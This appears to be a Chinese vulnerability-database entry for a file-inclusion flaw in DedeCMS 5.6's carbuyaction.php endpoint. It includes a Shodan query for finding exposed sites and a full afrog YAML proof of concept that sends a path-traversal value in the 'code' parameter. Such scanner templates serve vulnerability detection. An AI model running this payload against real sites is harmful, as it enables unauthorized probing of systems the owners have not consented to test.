dedecms-carbuyaction-fileinclude: DedeCmsV5.6 Carbuyaction Fileinclude

日期: 2025-09-01 | 影响软件: DedeCmsV5.6 | POC: 已公开

漏洞描述

A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter. shodan-query: http.html:"power by dedecms" || title:"dedecms" app="DedeCMS"

PoC代码[已公开]

id: dedecms-carbuyaction-fileinclude

info:
    name: DedeCmsV5.6 Carbuyaction Fileinclude
    author: harris2015(https://github.com/harris2015)
    severity: high
    verified: true
    description: |
        A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
        shodan-query: http.html:"power by dedecms" || title:"dedecms"
        app="DedeCMS"
    reference:
        - https://www.cnblogs.com/milantgh/p/3615986.html

rules:
    r0:
        request:
            method: GET
            path: /plus/carbuyaction.php?dopost=return&code=../../
            headers:
                Cookie: code=alipay
            follow_redirects: true
        expression: response.status == 200
    r1:
        request:
            method: GET
            path: /plus/carbuyaction.php?dopost=return&code=../../
            headers:
                Cookie: code=cod
            follow_redirects: true
        expression: response.status == 200 && response.body.bcontains(bytes("Cod::respond()"))
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dedecms-carbuyaction-fileinclude.yaml

相关漏洞推荐